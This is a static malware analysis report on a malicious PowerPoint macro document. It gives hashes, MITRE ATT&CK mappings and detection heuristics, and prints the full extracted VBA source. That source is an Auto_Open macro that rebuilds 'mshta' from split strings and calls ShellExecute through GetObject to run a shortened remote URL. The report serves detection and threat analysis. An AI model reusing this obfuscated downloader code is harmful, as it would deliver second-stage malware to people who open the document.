Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a0b9c53250f2573a…

MALICIOUS

Office (OOXML)

10.5 KB First seen: 2021-06-17
MD5: 8d4917417f56f60a1e05c6b6349a4414 SHA-1: 88b64ce0f3a666825b7c2a83582f044fc92d032b SHA-256: a0b9c53250f2573aae9e51dbe4607e90e4e7dca69e7907c8be936417ebe0754c
172 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.005 System Binary Proxy Execution: Mshta T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is automatically executed upon opening the document. This macro reassembles the string "mshta" and uses it to execute a URL, which is likely a second-stage payload. The obfuscation technique of splitting keywords and the use of Auto_Open macro indicate malicious intent. The macro attempts to download and execute a payload from the provided URL.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/yu.bin)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    . _
ShellExecute@ _
NamakBora _
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    = _
GetObject _
(StrReverse _
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub _
AutO_opEn _
()
  • VBA project is signed but not by a recognised publisher info VBA_SIGNED_UNTRUSTED
    The VBA project carries a digital signature, but the signer does not chain to a recognised code-signing publisher/CA (self-signed, unknown issuer, or unparseable). A signature alone is not evidence of benignity — malware is routinely self-signed or signed with stolen certificates.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/asahdjiaiaaarqawn In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1277 bytes
SHA-256: 96df2f1572c13e286aa93b71a36ca08ddfa244f09228c81914a99eca0b82ad61
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub _
AutO_opEn _
()

Dim _
bora _
As _
New _
Class1

Dim _
NamakBora _
, _
lora _
As _
String
NamakBora _
= _
bora _
. _
getEnumName _
(1)
lora _
= _
bora _
. _
getEnumName _
(2)
lora2 _
= _
bora _
. _
getEnumName _
(2)


bora _
. _
myvalue _
. _
ShellExecute@ _
NamakBora _
, _
lora2

End _
Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Enum myenum

    myname1 = 1
    myname2 = 2
    myname3 = 3
    myname4 = 4
    
    End Enum
    
Public _
Function _
getEnumName _
(eValue As myenum)
Select _
Case _
eValue
    Case _
    1
        getEnumName _
        = _
        "m" + "s" + "h" + "t" + "a"
    Case _
    2
        getEnumName _
        = _
        "https://www.bitly.com/asahdjiaiaaarqawn"
    End _
    Select
End _
Function


Public _
Function _
myvalue _
()
Set _
myvalue _
= _
GetObject _
(StrReverse _
("000045355444-E94A-EC11-972C-02690731:wen") _
)
End _
Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/yu.bin 19456 bytes
SHA-256: def3ba6bc930dc5cc4b503813e6d349f8fc186985febf8803153784f082c3c72
vbaProject_01.bin vba-project OOXML VBA project: ppt/vbaProjectSignature.bin 1928 bytes
SHA-256: 681a14074e7ffd7d566f011a14eaa288afdd753d225068965936e8f07a729154

Open this report in the interactive analyzer, or submit your own file for analysis.